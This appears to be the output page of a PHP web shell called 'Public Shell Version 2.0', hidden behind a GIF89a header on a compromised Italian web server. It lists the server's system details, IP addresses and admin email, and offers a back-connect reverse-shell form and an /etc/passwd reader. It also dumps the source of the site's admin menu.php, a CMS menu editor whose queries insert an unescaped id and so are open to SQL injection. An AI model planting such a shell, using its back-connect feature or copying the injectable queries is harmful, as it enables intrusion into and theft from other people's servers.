GIF89a

Public Shell

Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt : '; Public Shell Version 2.0

Disable Functions: system,popen,dl,passthru,proc_open,shell_exec

Current Path : /web/htdocs/www.giancio.com/home/admin/function/

Current File : /web/htdocs/www.giancio.com/home/admin/function/menu.php

<?php error_reporting(E_ALL); //////////////////////////VOCI DI MENU function listav() { global $conn, $id; $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>' . LISTA . ' ' . MENU . '</h3> </div> </div> <div class="col-md-6"> <a href="?azione=inserisciv" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> <form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultv" method="post"> <div class="input-group"style="margin-right:10px"> <input class="form-control" type="text" name="ricerca"> <span class="input-group-btn"> <button class="btn btn-default" type="submit"><i class="icon-search"></i></button> </span> </div> </form> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>'.MENU.'</th> <th>'.LIV.'</th> <th>'.CONT.'</th> <th>Menu a discesa</th> <th>'.RANK.'</th> <th width="5%"></th> <th width="5%"></th> </tr> </thead> <tbody>'; $result=mysql_query('select p1.id as id, p1.nome as nome, p1.toggle as toggle, p2.nome as padre, p1.rank as rank, pg1.pg_titolo as contenuto from menu as p1 LEFT JOIN menu as p2 on p1.padre=p2.id LEFT JOIN pages as pg1 on pg1.pg_id = p1.rif order by rank ASC'); while($array=mysql_fetch_assoc($result)) { if ($array['padre'] == NULL) {$array['padre'] = 'Primo Livello'; } if ($array['padre'] == NULL) {$array['toggle'] = 'x'; } if ($array['toggle'] == 0) {$array['toggle'] = 'NO'; } if ($array['toggle'] == 1) {$array['toggle'] = 'SI'; } $output .= '<tr>'; $output .= '<td>' . $array['nome'] . '</td>'; $output .= '<td>' . $array['padre'] . '</td>'; $output .= '<td>' . $array['contenuto'] . '</td>'; $output .= '<td>' . $array['toggle'] . '</td>'; $output .= '<td>' . $array['rank'] . '</td>'; $output .= '<td><a title="Modifica" href="?azione=modificav&id='.$array['id'].'"><i class="icon-edit"></i></a></td>'; $output .= '<td><a class="right cancel show-option" title="Elimina" href="?azione=eliminav&id='.$array['id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output .= '</tr>'; } $output .= '</tbody> </table> </div> <div class="wrapper-paging pull-right"> <ul> <li><a class="paging-back"><</a></li> <li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li> <li><a class="paging-next">></a></li> </ul> </div> <br /><br /> </div> </div> </div>'; return ($output); } //////////////////////////VOCI DI MENU function resultv() { $flag_colore = 0; global $conn, $id; $result = mysql_real_escape_string($_POST['ricerca']); $output = '<div class="row"> <div class="col-md-6"> <div class="headline"> <h3>' . LISTA . ' ' . MENU . '</h3> </div> </div> <div class="col-md-6"> <a href="?azione=inserisciv" class="btn btn-default pull-right"><i class="icon-plus"></i> Inserisci</a> <form class="form-search pull-right" enctype="multipart/form-data" action="?azione=resultv" method="post"> <div class="input-group"style="margin-right:10px"> <input class="form-control" type="text" name="ricerca"> <span class="input-group-btn"> <button class="btn btn-default" type="submit"><i class="icon-search"></i></button> </span> </div> </form> </div> </div>'; $output .= '<div class="row"> <div class="col-md-12"> <div class="table-wrapper"> <div class="wrapper-panel"> <table class="table table-striped" id="tab" > <thead> <tr> <th>'.MENU.'</th> <th>'.LIV.'</th> <th>'.CONT.'</th> <th>Menu a discesa</th> <th>'.RANK.'</th> <th width="5%"></th> <th width="5%"></th> </tr> </thead> <tbody>'; $result=mysql_query('select p1.id as id, p1.nome as nome, p1.toggle as toggle, p2.nome as padre, p1.rank as rank, pg1.pg_titolo as contenuto from menu as p1 LEFT JOIN menu as p2 on p1.padre=p2.id LEFT JOIN pages as pg1 on pg1.pg_id = p1.rif where p1.nome like \'%' . $result . '%\' order by rank ASC'); while($array=mysql_fetch_assoc($result)) { if ($array['padre'] == NULL) {$array['padre'] = 'Primo Livello'; } if ($array['padre'] == NULL) {$array['toggle'] = 'x'; } if ($array['toggle'] == 0) {$array['toggle'] = 'NO'; } if ($array['toggle'] == 1) {$array['toggle'] = 'SI'; } $output .= '<tr>'; $output .= '<td>' . $array['nome'] . '</td>'; $output .= '<td>' . $array['padre'] . '</td>'; $output .= '<td>' . $array['contenuto'] . '</td>'; $output .= '<td>' . $array['toggle'] . '</td>'; $output .= '<td>' . $array['rank'] . '</td>'; $output .= '<td><a title="Modifica" href="?azione=modificav&id='.$row['pg_id'].'"><i class="icon-edit"></i></a></td>'; $output .= '<td><a class="right cancel show-option" title="Elimina" href="?azione=eliminav&id='.$row['pg_id'].'" onClick="return confirm(\'Sei sicuro di voler eliminare questo elemento?\');"><i class="icon-remove-sign"></i></a></td>'; $output .= '</tr>'; } $output .= '</tbody> </table> </div> <div class="wrapper-paging pull-right"> <ul> <li><a class="paging-back"><</a></li> <li><a class="paging-this">Pagina <strong>0</strong> di <span>x</span></a></li> <li><a class="paging-next">></a></li> </ul> </div> <br /><br /> </div> </div> </div>'; return ($output); } function inserisciv() { global $conn, $id; $output = '<div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.ADD.' '.MENU.'</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvav&id=' . $id . '" method="post"> <div class="row"> <div class="col-md-4"> <label>' . TITOLO . '</label> <input class="form-control" type="text" placeholder="Type something…" name="nome"> </div> <div class="col-md-4"> <label>' . TITOLO . ' [English]</label> <input class="form-control" type="text" placeholder="Type something…" name="nome_en"> </div> </div> <br /> <div class="row"> <div class="col-md-4">'; $output .= '<label for="livello">' . LIV . '</label><br />'; $output .= '<select class="form-control" name="livello" id="livello" onchange="controlla()">'; $output .= '<option value="seleziona">' . SEL . '</option>'; $output .= '<option value="primo">' . PLIV . '</option>'; $output .= '<option value="sotto">' . SUB . '</option>'; $output .= '</select><br />'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<span id="sottolivello">'; $output .= '<label for="sottolivello">Voce di Menù Padre</label><br />'; $output .= '<select class="form-control" name="sottolivello" id="sottolivello">'; $output .= '<option value="0">' . SEL . '</option>'; $sql = 'select * from menu WHERE padre=0 order by id ASC'; $dati_voce = mysql_query($sql) or die(mysql_error()); $array_voce = mysql_fetch_array($dati_voce); while ($array_voce = mysql_fetch_array($dati_voce)) { $output .= '<option value="' . $array_voce['id'] . '">' . $array_voce['nome'] . '</option>'; } $output .= '</select><br />'; $output .= '</span>'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<span id="check">'; $output .= '<label for="toggle">La voce di menù dei sottolivelli?</label><br />'; $output .= '<input type="radio" id="toggle" name="toggle" value="0" /> NO<br />'; $output .= '<input type="radio" id="toggle" name="toggle" value="1"/> SI'; $output .= '</span><br /><br />'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<label for="contenuto">Contenuto Associato</label><br />'; $output .= '<select class="form-control" name="contenuto" id="contenuto">'; $output .= '<option value="0">' . SEL . '</option>'; $sql2 = 'select * from pages order by pg_id ASC'; $dati_voce2 = mysql_query($sql2) or die(mysql_error()); $array_voce2 = mysql_fetch_array($dati_voce2); while ($array_voce2 = mysql_fetch_array($dati_voce2)) { $output .= '<option value="' . $array_voce2['pg_id'] . '">' . $array_voce2['pg_titolo'] . '</option>'; } $output .= '</select><br />'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<label for="rank">' . RANK . '</label><br />'; $output .= '<input class="form-control" type="text" id="rank" style="width:50px" name="rank" /><br /><br />'; $output .= '</div> </div> <button class="btn btn-default" type="submit">' . SALVA . '</button> <br /><br /> </form>'; return ($output); } function salvav() { global $conn, $id; $errore = 0; $nome = mysql_real_escape_string($_POST['nome']); $nome_en = mysql_real_escape_string($_POST['nome_en']); $toggle = mysql_real_escape_string($_POST['toggle']); $rif = mysql_real_escape_string($_POST['contenuto']); $padre = mysql_real_escape_string($_POST['sottolivello']); $rank = mysql_real_escape_string($_POST['rank']); if ($errore == 0) { if ($id == 0) { $sql = 'insert into menu(nome,padre,rank,rif,toggle) values("' . $nome . '","' . $padre . '","' . $rank . '","' . $rif . '","' . $toggle . '")'; mysql_query($sql, $conn) or die(mysql_error()); $sql_en = 'insert into menu_en(nome,padre,rank,rif,toggle) values("' . $nome_en . '","' . $padre . '","' . $rank . '","' . $rif . '","' . $toggle . '")'; mysql_query($sql_en, $conn) or die(mysql_error()); header('location: cms.php?ins&azione=listav'); //restituisci messaggio di errore $id = mysql_insert_id(); } else { $sql = 'update menu set nome="' . $nome . '", padre="' . $padre . '", rank="' . $rank . '", rif="' . $rif . '", toggle="' . $toggle . '" where id="' . $id . '"'; mysql_query($sql, $conn) or die(mysql_error()); $sql = 'update menu_en set nome="' . $nome_en . '", padre="' . $padre . '", rank="' . $rank . '", rif="' . $rif . '", toggle="' . $toggle . '" where id="' . $id . '"'; mysql_query($sql, $conn) or die(mysql_error()); header('location: cms.php?agg&azione=listav'); } } else {$output = 'errore nel form.<br /><a href="javascript:history.go(-1)">Torna indietro</a>'; } return ($output); } function modificav() { global $conn, $id; $sql = 'select * from menu where id="' . $id . '" order by id ASC'; $dati_voce = mysql_query($sql) or die(mysql_error()); $array_voce = mysql_fetch_array($dati_voce); $sql_en = 'select * from menu_en where id="' . $id . '" order by id ASC'; $dati_voce_en = mysql_query($sql_en) or die(mysql_error()); $array_voce_en = mysql_fetch_array($dati_voce_en); $output = '<div class="row"> <div class="col-md-10"> <div class="headline"> <h3>'.MOD.' '.MENU.'</h3> </div> </div> <div class="col-md-2"> <a class="btn btn-default pull-right" href="javascript:history.back()"><i class="icon-reply"></i> Torna indietro</a> </div> </div>'; $output .= '<form id="contactform" enctype="multipart/form-data" name="contactform" action="?azione=salvav&id=' . $id . '" method="post"> <div class="row"> <div class="col-md-4"> <label>' . TITOLO . '</label> <input class="form-control" type="text" placeholder="Type something…" name="nome" value="'.$array_voce['nome'].'"> </div> <div class="col-md-4"> <label>' . TITOLO . ' [English]</label> <input class="form-control" type="text" placeholder="Type something…" name="nome_en" value="'.$array_voce_en['nome'].'"> </div> </div> <br /> <div class="row"> <div class="col-md-4">'; $output .= '<label for="livello">' . LIV . '</label><br />'; $output .= '<select class="form-control" name="livello" id="livello" onchange="controlla()">'; $output .= '<option value="seleziona">' . SEL . '</option>'; $output .= '<option value="primo">' . PLIV . '</option>'; $output .= '<option value="sotto">' . SUB . '</option>'; $output .= '</select><br />'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<span id="sottolivello">'; $output .= '<label for="sottolivello">Voce di Menù Padre</label><br />'; $output .= '<select class="form-control" name="sottolivello" id="sottolivello">'; $sql = 'SELECT m1.id, m1.nome from menu m LEFT JOIN menu m1 on m.padre = m1.id WHERE m.id = ' . $id . ' '; $dati_voce_check = mysql_query($sql) or die(mysql_error()); $array_voce_check = mysql_fetch_array($dati_voce_check); $output .= '<option value="' . $array_voce_check['id'] . '">' . $array_voce_check['nome'] . '</option>'; $sql = 'select * from menu WHERE padre=0 order by id ASC'; $dati_voce_padre = mysql_query($sql) or die(mysql_error()); $array_voce_padre = mysql_fetch_array($dati_voce_padre); while ($array_voce_padre = mysql_fetch_array($dati_voce_padre)) { $output .= '<option value="' . $array_voce_padre['id'] . '">' . $array_voce_padre['nome'] . '</option>'; } $output .= '</select><br />'; $output .= '</span>'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<span id="check">'; $output .= '<label for="toggle">La voce di menù dei sottolivelli?</label><br />'; $output .= '<input type="radio" id="toggle" name="toggle" value="0"'; if($array_voce['toggle']==0){$output .='checked';}$output .='/> NO<br />'; $output .= '<input type="radio" id="toggle" name="toggle" value="1"'; if($array_voce['toggle']==1){$output .='checked';}$output .='/> SI<br />'; $output .= '</span><br /><br />'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<label for="contenuto">Contenuto Associato</label><br />'; $output .= '<select class="form-control" name="contenuto" id="contenuto">'; $sql3 = 'SELECT pg_titolo, pg_id from pages p LEFT JOIN menu m on m.rif = p.pg_id WHERE m.id =' . $id . ''; $dati_voce3 = mysql_query($sql3) or die(mysql_error()); $array_voce3 = mysql_fetch_array($dati_voce3); $output .= '<option value="' . $array_voce3['pg_id'] . '">' . $array_voce3['pg_titolo'] . '</option>'; $output .= '<option value="0">' . SEL . '</option>'; $sql2 = 'select * from pages order by pg_id ASC'; $dati_voce2 = mysql_query($sql2) or die(mysql_error()); $array_voce2 = mysql_fetch_array($dati_voce2); while ($array_voce2 = mysql_fetch_array($dati_voce2)) { $output .= '<option value="' . $array_voce2['pg_id'] . '">' . $array_voce2['pg_titolo'] . '</option>'; } $output .= '</select><br />'; $output .= '</div> </div> <div class="row"> <div class="col-md-4">'; $output .= '<label for="rank">' . RANK . '</label><br />'; $output .= '<input class="form-control" type="text" id="rank" style="width:50px" name="rank" value="'.$array_voce['rank'].'" /><br /><br />'; $output .= '</div> </div> <button class="btn btn-default" type="submit">' . SALVA . '</button> <br /><br /> </form>'; return ($output); } function eliminav() { global $conn, $id; $sql = 'delete from menu where id="' . $id . '"'; mysql_query($sql) or die(mysql_error()); header('location: index.php?del&azione=listav'); } ?>

Public Shell Version 2.0